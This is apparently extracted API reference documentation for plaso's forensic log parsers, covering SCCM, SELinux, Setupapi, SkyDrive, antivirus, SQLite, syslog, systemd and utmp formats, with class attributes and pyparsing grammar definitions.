LINE_STRUCTURES = [('log_entry', {{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)} Re:('.*?(?=(\\<!\\[LOG\\[))')}), ('log_entry_at_end', {{{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)} rest of line} lineEnd}), ('log_entry_offset', {{{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} Re:('[-+]\\d{2,3}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)} Re:('.*?(?=(\\<!\\[LOG\\[))')}), ('log_entry_offset_at_end', {{{{{{{{{{{{{{{{{{{{"<![LOG[" Re:('.*?(?=(]LOG]!><time="))')} "]LOG]!><time=""} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(".")} Re:('\\d{3,7}')} Re:('[-+]\\d{2,3}')} "" date=""} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} "" component=""} W:(ABCD...)} rest of line} lineEnd})]

NAME = 'sccm'

ParseRecord(parser_mediator, key, structure)Parse the record and return an SCCM log event object.

Parameters





VerifyStructure(parser_mediator, lines)Verifies whether content corresponds to an SCCM log file.

Parameters




Return type bool



plaso.parsers.selinux module

This file contains SELinux audit log (audit.log) file parser.

Information updated 16 january 2013.

An example:

type=AVC msg=audit(1105758604.519:420): avc: denied { getattr } for pid=5962 comm=”httpd”path=”/home/auser/public_html” dev=sdb2 ino=921135

Where msg=audit(1105758604.519:420) contains the number of seconds since January 1, 1970 00:00:00 UTC and thenumber of milliseconds after the dot for example: “seconds: 1105758604, milliseconds: 519”.

The number after the timestamp (420 in the example) is a ‘serial number’ that can be used to correlate multiple logsgenerated from the same event.

References:

• http://selinuxproject.org/page/NB_AL

• http://blog.commandlinekungfu.com/2010/08/episode-106-epoch-fail.html

• http://www.redhat.com/promo/summit/2010/presentations/taste_of_training/ Summit_2010_SELinux.pdf

class plaso.parsers.selinux.SELinuxLogEventDataBases: plaso.containers.events.EventData

SELinux log event data.

audit_typeaudit type.

Type str

bodybody of the log line.

Type str

pidprocess identifier (PID) that created the SELinux log line.

Type int

DATA_TYPE = 'selinux:line'

class plaso.parsers.selinux.SELinuxParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parser for SELinux audit log (audit.log) files.

DATA_FORMAT = 'SELinux audit log (audit.log) file'

LINE_STRUCTURES = [('line', Dict:({{Group:({{"type" Suppress:("=")} {W:(ABCD...) ^ Re:('UNKNOWN\\[[0-9]+\\]')}}) Group:({{{{{{{"msg" Suppress:("=audit(")} W:(0123...)} Suppress:(".")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:("):")})} Group:({Empty rest of line})}))]

NAME = 'selinux'

ParseRecord(parser_mediator, key, structure)Parses a structure of tokens derived from a line of a text file.

Parameters




http://selinuxproject.org/page/NB_AL

http://blog.commandlinekungfu.com/2010/08/episode-106-epoch-fail.html

http://www.redhat.com/promo/summit/2010/presentations/taste_of_training/




VerifyStructure(parser_mediator, line)Verifies if a line from a text file is in the expected format.

Parameters




Return type bool

plaso.parsers.setupapi module

Parser for Windows Setupapi log files.

The format is documented at: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/setupapi-text-logs

class plaso.parsers.setupapi.SetupapiLogEventDataBases: plaso.containers.events.EventData

Setupapi log event data.

entry_typelog entry type, for examaple “Device Install - PCIVEN_104C&DEV_8019&SUBSYS_8010104C&REV_003&61aaa01&0&38”or “Sysprep Respecialize - {804b345a-ffd7-854c-a1b5-ca9598907846}”.

Type str

exit_statusthe exit status of the logged operation.

Type str

DATA_TYPE = 'setupapi:log:line'

class plaso.parsers.setupapi.SetupapiLogParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses events from Windows Setupapi log files.

DATA_FORMAT = 'Windows SetupAPI log file'

LINE_STRUCTURES = [('ignorable_line', {{"[Boot Session:" Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} "]"}), ('ignorable_line', {"[BeginLog]" lineEnd}), ('ignorable_line', {"[Device Install Log]" lineEnd}), ('ignorable_line', {{stringStart {" . " | "!!! " | "! " | " "}} rest of line}), ('ignorable_line', {{stringStart {"!!! " | "! " | " "}} rest of line}), ('section_end', {{Suppress:("<<< Section end ") Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} lineEnd}), ('section_end_exit_status', {{{Suppress:("<<< [Exit status: ") !W:(])} "]"} lineEnd}), ('section_header', {{{Suppress:(">>> [") !W:(])} "]"} lineEnd}), ('section_start', {{Suppress:(">>> Section start") Group:({{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)})} lineEnd})]

NAME = 'setupapi'


Parameters



• structure (pyparsing.ParseResults) – structure of tokens derived from a logentry.


https://docs.microsoft.com/en-us/windows-hardware/drivers/install/setupapi-text-logs



VerifyStructure(parser_mediator, line)Verify that this file is a Windows Setupapi log file.

Parameters




Return type bool

plaso.parsers.skydrivelog module

This file contains SkyDrive log file parser in plaso.

class plaso.parsers.skydrivelog.SkyDriveLogEventDataBases: plaso.containers.events.EventData

SkyDrive log event data.

detaildetails.

Type str

log_levellog level.

Type str

modulename of the module that generated the log message.

Type str

source_codesource file and line number that generated the log message.

Type str

DATA_TYPE = 'skydrive:log:line'

class plaso.parsers.skydrivelog.SkyDriveLogParserBases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

Parses SkyDrive log files.

DATA_FORMAT = 'OneDrive (or SkyDrive) log file'

IGNORE_FIELD = Suppress:(!W:(,))

LINE_STRUCTURES = [('logline', {{{{{{{{{{{{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:(",")} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} !W:(,)} Suppress:(",")} !W:(,)} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} !W:(,)} Suppress:(",")} SkipTo:({{StringEnd | {Suppress:("######") "Logging started."}} | {{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:(",")} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}})} [lineEnd]...}), ('header', {{{{{{{{Suppress:("######") "Logging started."} "Version="} W:(0123...)} Suppress:("StartSystemTime:")} Group:({{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} W:(0123...)} Suppress:(".")} W:(0123...)})} "StartLocalTime:"} SkipTo:(lineEnd)} lineEnd})]

MSEC = W:(0123...)

NAME = 'skydrive_log'

ParseRecord(parser_mediator, key, structure)Parse each record structure and return an EventObject if applicable.

Parameters







VerifyStructure(parser_mediator, lines)Verify that this file is a SkyDrive log file.

Parameters




Return type bool

class plaso.parsers.skydrivelog.SkyDriveOldLogEventDataBases: plaso.containers.events.EventData

SkyDrive old log event data.

log_levellog level.

Type str

source_codesource file and line number that generated the log message.

Type str

textlog message.

Type str

DATA_TYPE = 'skydrive:log:old:line'

class plaso.parsers.skydrivelog.SkyDriveOldLogParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parse SkyDrive old log files.

DATA_FORMAT = 'OneDrive (or SkyDrive) old log file'

LINE_STRUCTURES = [('logline', {{{{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}}) Combine:({{{{!W:(:) ":"} W:(0123...)} "!"} W:(0123...)})} {{Suppress:("(") SkipTo:(")")} Suppress:(")")}} ":"} SkipTo:(lineEnd)}), ('no_header_single_line', {{~{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}})} [Suppress:("->")]} SkipTo:(lineEnd)})]

NAME = 'skydrive_log_old'

ParseRecord(parser_mediator, key, structure)Parse each record structure and return an EventObject if applicable.

Parameters







VerifyStructure(parser_mediator, line)Verify that this file is a SkyDrive old log file.

Parameters




Return type bool

plaso.parsers.sophos_av module

Sophos Anti-Virus log (SAV.txt) parser.

References https://community.sophos.com/kb/en-us/110923

class plaso.parsers.sophos_av.SophosAVLogEventDataBases: plaso.containers.events.EventData

Sophos Anti-Virus log event data.

textSophos Anti-Virus log message.

Type str

DATA_TYPE = 'sophos:av:log'

class plaso.parsers.sophos_av.SophosAVLogParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses Anti-Virus logs (SAV.txt) files.

DATA_FORMAT = 'Sophos Anti-Virus log file (SAV.txt) file'

LINE_STRUCTURES = [('logline', {Group:({{{W:(0123...) W:(0123...)} W:(0123...)} {{W:(0123...) W:(0123...)} W:(0123...)}}) SkipTo:(lineEnd)})]


NAME = 'sophos_av'


Parameters






https://community.sophos.com/kb/en-us/110923


VerifyStructure(parser_mediator, line)Verify that this file is a Sophos Anti-Virus log file.

Parameters

• parser_mediator (ParserMediator) – mediates interactions between parsers andother components, such as storage and dfVFS.



Return type bool

plaso.parsers.spotlight_storedb module

Parser for Apple Spotlight store database files.

class plaso.parsers.spotlight_storedb.SpotlightStoreDatabaseParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for Apple Spotlight store database (store.db) files.

DATA_FORMAT = 'Apple Spotlight store database (store.db) file'




NAME = 'spotlight_storedb'

ParseFileObject(parser_mediator, file_object)Parses an Apple Spotlight store database file-like object.

Parameters




class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataAttributeBases: object

Metadata attribute.

keykey or name of the metadata attribute.

Type str

property_typemetadata attribute property type.

Type int

valuemetadata attribute value.

Type object



value_typemetadata attribute value type.

Type int

class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemBases: object

Metadata item.

attributesmetadata attributes.

Type dict[str, SpotlightStoreMetadataAttribute]

data_sizesize of the record data.

Type int

flagsrecord flags.

Type int

identifierfile (system) entry identifier.

Type int

item_identifieritem identifier.

Type int

last_update_timelast update time.

Type int

parent_identifierparent file (system) entry identifier.

Type int

class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventDataBases: plaso.containers.events.EventData

Apple Spotlight store database metadata item event data.

content_typecontent type of the corresponding file (system) entry (kMDItemContentType).

Type str

file_namename of the corresponding file (system) entry (_kMDItemFileName).

Type str

file_system_identifierfile system identifier, for example the catalog node identifier (CNID) on HFS.

Type int

kinditem kind (kMDItemKind).



Type str

parent_file_system_identifierfile system identifier of the parent.

Type int

DATA_TYPE = 'spotlight:metadata_item'

plaso.parsers.sqlite module

SQLite parser.

class plaso.parsers.sqlite.SQLiteCacheBases: plaso.parsers.plugins.BasePluginCache

Cache for storing results of SQL queries.

CacheQueryResults(sql_results, attribute_name, key_name, column_names)Build a dictionary object based on a SQL command.

This function will take a SQL command, execute it and for each resulting row it will store a key in adictionary.

An example:

sql_results = A SQL result object after executing theSQL command: 'SELECT foo, bla, bar FROM my_table'

attribute_name = 'all_the_things'key_name = 'foo'column_names = ['bla', 'bar']

Results from running this against the database: ‘first’, ‘stuff’, ‘things’ ‘second’, ‘another stuff’, ‘anotherthing’

This will result in a dictionary object being created in the cache, called ‘all_the_things’ and it will containthe following value:

all_the_things = {'first': ['stuff', 'things'],'second': ['another_stuff', 'another_thing'],'third': ['single_thing']}

Parameters

• sql_results (sqlite3.Cursor) – result after executing a SQL command on adatabase.

• attribute_name (str) – attribute name in the cache to store results to. This will bethe name of the dictionary attribute.

• key_name (str) – name of the result field that should be used as a key in the resultingdictionary that is created.

• column_names (list[str]) – of column names that are stored as values to the dic-tionary. If this list has only one value in it the value will be stored directly, otherwise thevalue will be a list containing the extracted results based on the names provided in this list.

GetRowCache(query)Retrieves the row cache for a specific query.



The row cache is a set that contains hashes of values in a row. The row cache is used to find duplicate rowwhen a database and a database with a WAL file is parsed.

Parameters query (str) – query.

Returns hashes of the rows that have been parsed.

Return type set

class plaso.parsers.sqlite.SQLiteDatabase(filename, temporary_directory=None)Bases: object

SQLite database.

schemaschema as an SQL query per table name, for example {‘Users’: ‘CREATE TABLE Users (“id” INTEGERPRIMARY KEY, . . . )’}.

Type dict[str, str]

Close()Closes the database connection and cleans up the temporary file.

Open(file_object, wal_file_object=None)Opens a SQLite database file.

Since pysqlite cannot read directly from a file-like object a temporary copy of the file is made. Aftercreating a copy the database file this function sets up a connection with the database and determines thenames of the tables.

Parameters


• wal_file_object (Optional[dfvfs.FileIO]) – file-like object for the Write-Ahead Log (WAL) file.

Raises

• IOError – if the file-like object cannot be read.

• OSError – if the file-like object cannot be read.

• sqlite3.DatabaseError – if the database cannot be parsed.

• ValueError – if the file-like object is missing.

Query(query)Queries the database.

Parameters query (str) – SQL query.

Returns results.

Return type sqlite3.Cursor

Raises sqlite3.DatabaseError – if querying the database fails.

SCHEMA_QUERY = 'SELECT tbl_name, sql FROM sqlite_master WHERE type = "table" AND tbl_name != "xp_proc" AND tbl_name != "sqlite_sequence"'

property tablesnames of all the tables.

Type list[str]



class plaso.parsers.sqlite.SQLiteParserBases: plaso.parsers.interface.FileEntryParser

Parses SQLite database files.

DATA_FORMAT = 'SQLite database file'




NAME = 'sqlite'

ParseFileEntry(parser_mediator, file_entry)Parses a SQLite database file entry.

Parameters


• file_entry (dfvfs.FileEntry) – file entry to be parsed.


plaso.parsers.symantec module

This file contains a Symantec parser in plaso.

class plaso.parsers.symantec.SymantecEventDataBases: plaso.containers.events.EventData

Symantec event data.

accessaccess.

Type str

action0action0.

Type str

action1action1.

Type str

action1_statusaction1 status.

Type str

action2action2.

Type str

action2_statusaction2 status.

Type str



addressaddress.

Type str

backup_idbackup identifier.

Type str

catcategory.

Type str

cleaninfoclean information.

Type str

clientgroupclient group.

Type str

compressedcompressed.

Type str

computercomputer.

Type str

definfodefinfo.

Type str

defseqnumberdef sequence number.

Type str

deleteinfodelete information.

Type str

depthdepth.

Type str


Type str

domain_guiddomain identifier (GUID).

Type str

domainnamedomain name.



Type str

err_codeerror code.

Type str

event_dataevent data.

Type str

eventevent.

Type str

extraextra.

Type str

filefile.

Type str

flagsflags.

Type str

groupidgroup identifier.

Type str

guidguid.

Type str

license_expiration_dtlicense expiration date.

Type str

license_feature_namelicense feature name.

Type str

license_feature_verlicense feature ver.

Type str

license_fulfillment_idlicense fulfillment identifier.

Type str

license_lifecyclelicense lifecycle.

Type str



license_seats_deltalicense seats delta.

Type str

license_seatslicense seats.

Type str

license_seats_totallicense seats total.

Type str

license_serial_numlicense serial number.

Type str

license_start_dtlicense start date.

Type str

loggerlogger.

Type str

login_domainlogin domain.

Type str

log_session_guidlog session identifier (GUID).

Type str

macaddrMAC address.

Type str

new_extnew ext.

Type str

ntdomainntdomain.

Type str

offsetoffset.

Type str

parentparent.

Type str

quarfwd_statusquarfwd status.



Type str

remote_machine_ipremote machine IP address.

Type str

remote_machineremote machine.

Type str

scanidscan identifier.

Type str

snd_statussnd status.

Type str

statusstatus.

Type str

still_infectedstill infected.

Type str

timetime.

Type str

useruser.

Type str

vbin_idvbin identifier.

Type str

vbin_session_idvbin session identifier.

Type str

versionversion.

Type str

virus_idvirus identifier.

Type str

virusvirus.

Type str



virustypevirustype.

Type str

DATA_TYPE = 'av:symantec:scanlog'

class plaso.parsers.symantec.SymantecParser(encoding=None)Bases: plaso.parsers.dsv_parser.DSVParser

Parses Symantec AV Corporate Edition and Endpoint Protection log files.

COLUMNS = ['time', 'event', 'cat', 'logger', 'computer', 'user', 'virus', 'file', 'action1', 'action2', 'action0', 'virustype', 'flags', 'description', 'scanid', 'new_ext', 'groupid', 'event_data', 'vbin_id', 'virus_id', 'quarfwd_status', 'access', 'snd_status', 'compressed', 'depth', 'still_infected', 'definfo', 'defseqnumber', 'cleaninfo', 'deleteinfo', 'backup_id', 'parent', 'guid', 'clientgroup', 'address', 'domainname', 'ntdomain', 'macaddr', 'version:', 'remote_machine', 'remote_machine_ip', 'action1_status', 'action2_status', 'license_feature_name', 'license_feature_ver', 'license_serial_num', 'license_fulfillment_id', 'license_start_dt', 'license_expiration_dt', 'license_lifecycle', 'license_seats_total', 'license_seats', 'err_code', 'license_seats_delta', 'status', 'domain_guid', 'log_session_guid', 'vbin_session_id', 'login_domain', 'extra']

DATA_FORMAT = 'AV Corporate Edition and Endpoint Protection log file'

NAME = 'symantec_scanlog'


Parameters





Parameters




Return type bool

plaso.parsers.syslog module

Parser for syslog formatted log files.

Also see: * https://www.rsyslog.com/doc/v8-stable/configuration/templates.html

class plaso.parsers.syslog.SyslogCommentEventDataBases: plaso.containers.events.EventData

Syslog comment event data.

bodymessage body.

Type str

DATA_TYPE = 'syslog:comment'

class plaso.parsers.syslog.SyslogLineEventData(data_type='syslog:line')Bases: plaso.containers.events.EventData

Syslog line event data.


https://www.rsyslog.com/doc/v8-stable/configuration/templates.html


bodymessage body.

Type str

hostnamehostname of the reporter.

Type str

pidprocess identifier of the reporter.

Type str

reporterreporter.

Type str

severityseverity.

Type str

DATA_TYPE = 'syslog:line'

class plaso.parsers.syslog.SyslogParserBases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

Parses syslog formatted log files

DATA_FORMAT = 'System log (syslog) file'

EnablePlugins(plugin_includes)Enables parser plugins.

Parameters plugin_includes (list[str]) – names of the plugins to enable, whereNone or an empty list represents all plugins. Note that the default plugin is handled sep-arately.

LINE_STRUCTURES = [('chromeos_syslog_line', {{{{{{{Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]}) EMERG | ALERT | CRIT | ERR | WARNING | NOTICE | INFO | DEBUG} W:(0123...)} [Suppress:(":")]} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('kernel_syslog_line', {{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} "kernel"} Suppress:(":")} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('rsyslog_line', {{{{{{{Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]}) W:(0123...)} W:(0123...)} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [{{Suppress:("<") W:(0123...)} Suppress:(">")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('rsyslog_traditional_line', {{{{{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} W:(0123...)} W:(0123...)} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [{{Suppress:("<") W:(0123...)} Suppress:(">")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('syslog_comment', {{{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} Suppress:(":")} Suppress:("---")} SkipTo:(" ---")} Suppress:("---")} LineEnd})]

NAME = 'syslog'


Parameters





VerifyStructure(parser_mediator, lines)Verifies that this is a syslog-formatted file.

Parameters






Return type bool

plaso.parsers.systemd_journal module

Parser for Systemd journal files.

class plaso.parsers.systemd_journal.SystemdJournalEventDataBases: plaso.containers.events.EventData

Systemd journal event data.

bodymessage body.

Type str

hostnamehostname.

Type str


Type int

reporterreporter.

Type str

DATA_TYPE = 'systemd:journal'

class plaso.parsers.systemd_journal.SystemdJournalParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parses Systemd Journal files.

DATA_FORMAT = 'Systemd journal file'




NAME = 'systemd_journal'

ParseFileObject(parser_mediator, file_object)Parses a Systemd journal file-like object.

Parameters



Raises UnableToParseFile – when the header cannot be parsed.



plaso.parsers.text_parser module

This file contains a class to provide a parsing framework to plaso.

This class contains a base framework class for parsing file-like objects, and also some implementations that extend itto provide a more comprehensive parser.

plaso.parsers.text_parser.ConvertTokenToInteger(string, location, tokens)Pyparsing parse action callback to convert a token into an integer value.

Parameters

• string (str) – original string.

• location (int) – location in the string where the token was found.

• tokens (list[str]) – tokens.

Returns integer value or None.

Return type int

class plaso.parsers.text_parser.EncodedTextReader(encoding, buffer_size=2048)Bases: object

Encoded text reader.

ReadLine(file_object)Reads a line.

Parameters file_object (dfvfs.FileIO) – file-like object.

Returns line read from the lines buffer.

Return type str

ReadLines(file_object)Reads lines into the lines buffer.

Parameters file_object (dfvfs.FileIO) – file-like object.

Reset()Resets the encoded text reader.

SkipAhead(file_object, number_of_characters)Skips ahead a number of characters.

Parameters


• number_of_characters (int) – number of characters.

plaso.parsers.text_parser.PyParseIntCast(string, location, tokens)Return an integer from a string.

This is a pyparsing callback method that converts the matched string into an integer.

The method modifies the content of the tokens list and converts them all to an integer value.

Parameters

• string (str) – original string.

• location (int) – location in the string where the match was made.

• tokens (list[str]) – extracted tokens, where the string to be converted is stored.



class plaso.parsers.text_parser.PyparsingConstantsBases: object

Constants for pyparsing-based parsers.

COMMENT_LINE_HASH = {"#" SkipTo:(LineEnd)}

DATE = Group:({{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)})

DATE_ELEMENTS = {{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)}

DATE_TIME = Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})

DATE_TIME_MSEC = Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}})

FOUR_DIGITS = W:(0123...)

HYPHEN = Suppress:("-")

INTEGER = W:(0123...)

IPV4_ADDRESS = IPv4 address

IPV6_ADDRESS = IPv6 address

IP_ADDRESS = {IPv4 address | IPv6 address}

MONTH = W:(ABCD..., abcd...)

ONE_OR_TWO_DIGITS = W:(0123...)

PID = W:(0123...)

THREE_DIGITS = W:(0123...)

THREE_LETTERS = W:(ABCD...)

TIME = Group:({{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})

TIME_ELEMENTS = {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}

TIME_MSEC = {{Group:({{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}) Suppress:(".")} W:(0123...)}

TIME_MSEC_ELEMENTS = {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}

TWO_DIGITS = W:(0123...)

class plaso.parsers.text_parser.PyparsingMultiLineTextParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Multi line text parser interface based on pyparsing.

BUFFER_SIZE = 2048

ParseFileObject(parser_mediator, file_object)Parses a text file-like object using a pyparsing definition.

Parameters




abstract ParseRecord(parser_mediator, key, structure)Parses a log record structure and produces events.



This function takes as an input a parsed pyparsing structure and produces an EventObject if possible fromthat structure.

Parameters



• structure (pyparsing.ParseResults) – tokens from a parsed log line.

Returns event or None.

Return type EventObject

abstract VerifyStructure(parser_mediator, lines)Verify the structure of the file and return boolean based on that check.

This function should read enough text from the text file to confirm that the file is the correct one for thisparticular parser.

Parameters




Return type bool

class plaso.parsers.text_parser.PyparsingSingleLineTextParserBases: plaso.parsers.interface.FileObjectParser

Single line text parser interface based on pyparsing.

LINE_STRUCTURES = []

MAXIMUM_CONSECUTIVE_LINE_FAILURES = 20


ParseFileObject(parser_mediator, file_object)Parses a text file-like object using a pyparsing definition.

Parameters




abstract ParseRecord(parser_mediator, key, structure)Parses a log record structure and produces events.

This function takes as an input a parsed pyparsing structure and produces an EventObject if possible fromthat structure.

Parameters





• structure (pyparsing.ParseResults) – tokens from a parsed log line.

abstract VerifyStructure(parser_mediator, line)Verify the structure of the file and return boolean based on that check.

This function should read enough text from the text file to confirm that the file is the correct one for thisparticular parser.

Parameters




Return type bool

plaso.parsers.trendmicroav module

Parser for Trend Micro Antivirus logs.

Trend Micro uses two log files to track the scans (both manual/scheduled and real-time) and the web reputation(network scan/filtering).

Currently only the first log is supported.

class plaso.parsers.trendmicroav.OfficeScanVirusDetectionParser(encoding=None)Bases: plaso.parsers.trendmicroav.TrendMicroBaseParser

Parses the Trend Micro Office Scan Virus Detection Log.

COLUMNS = ['date', 'time', 'threat', 'action', 'scan_type', 'unused1', 'path', 'filename', 'unused2', 'timestamp', 'unused3', 'unused4']

DATA_FORMAT = 'Trend Micro Office Scan Virus Detection log file'

MIN_COLUMNS = 8

NAME = 'trendmicro_vd'


Parameters





Parameters




Return type bool



class plaso.parsers.trendmicroav.OfficeScanWebReputationParser(encoding=None)Bases: plaso.parsers.trendmicroav.TrendMicroBaseParser

Parses the Trend Micro Office Scan Web Reputation detection log.

COLUMNS = ('date', 'time', 'block_mode', 'url', 'group_code', 'group_name', 'credibility_rating', 'policy_identifier', 'application_name', 'credibility_score', 'ip', 'threshold', 'timestamp', 'unused')

DATA_FORMAT = 'Trend Micro Office Web Reputation log file'

MIN_COLUMNS = 12

NAME = 'trendmicro_url'


Parameters





Parameters




Return type bool

class plaso.parsers.trendmicroav.TrendMicroAVEventDataBases: plaso.containers.events.EventData

Trend Micro AV Log event data.

actionaction.

Type str

filenamefilename.

Type str

pathpath.

Type str

scan_typescan_type.

Type str

threatthreat.

Type str



DATA_TYPE = 'av:trendmicro:scan'

class plaso.parsers.trendmicroav.TrendMicroBaseParser(encoding=None)Bases: plaso.parsers.dsv_parser.DSVParser

Common code for parsing Trend Micro log files.

The file format is reminiscent of CSV, but is not quite the same; the delimiter is a three-character sequence andthere is no provision for quoting or escaping.

COLUMNS = ()

DELIMITER = '<;>'

MIN_COLUMNS = None

class plaso.parsers.trendmicroav.TrendMicroUrlEventDataBases: plaso.containers.events.EventData

Trend Micro Web Reputation Log event data.

block_modeoperation mode.

Type str

urlaccessed URL.

Type str

group_codegroup code.

Type str

group_namegroup name.

Type str

credibility_ratingcredibility rating.

Type int

credibility_scorecredibility score.

Type int

policy_identifierpolicy identifier.

Type int

application_nameapplication name.

Type str

ipIP address.

Type str



thresholdthreshold value.

Type int

DATA_TYPE = 'av:trendmicro:webrep'

plaso.parsers.utmp module

Parser for Linux utmp files.

class plaso.parsers.utmp.UtmpEventDataBases: plaso.containers.events.EventData

utmp event data.

exit_statusexit status.

Type int

hostnamehostname or IP address.

Type str

